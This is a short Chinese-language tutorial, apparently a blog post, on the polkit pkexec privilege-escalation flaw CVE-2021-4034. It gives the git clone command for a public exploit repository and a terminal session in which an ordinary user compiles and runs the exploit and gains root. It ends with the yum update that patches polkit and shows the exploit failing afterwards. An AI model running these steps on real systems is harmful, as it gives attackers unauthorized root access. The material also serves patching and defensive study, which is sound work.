利用polkit漏洞提权

利用polkit漏洞提权 漏洞编号：CVE-2021-4034

#利用polkit漏洞提权
下载地址：git clone https://gitee.com/lutixiaya/cve-2021-4034.git

#普通用户执行以下命令
[xiaojiang@localhost ~]$ cd cve-2021-4034 && ls
evil-so.c exploit.c Makefile
[xiaojiang@localhost cve-2021-4034]$ id
uid=1001(xiaojiang) gid=1001(xiaojiang) groups=1001(xiaojiang)

执行make编译
[xiaojiang@localhost cve-2021-4034]$ make
[xiaojiang@localhost cve-2021-4034]$ ./exploit #执行提权命令
[root@localhost xiaojiang]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u

修复（切换root用户升级polkit）
# 查看可用版本
[root@localhost ~]# yum list polkit
[root@localhost ~]# yum update polkit -y
polkit-0.112-26.el7_9.1.x86_64 #升级至这个版本

#再次执行提权命令，提权失败
[xiaojiang@localhost cve-2021-4034]$ ./exploit
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
Report bugs to: http://lists.freedesktop.org/mailman/listinfo/polkit-devel
polkit home page: <http://www.freedesktop.org/wiki/Software/polkit>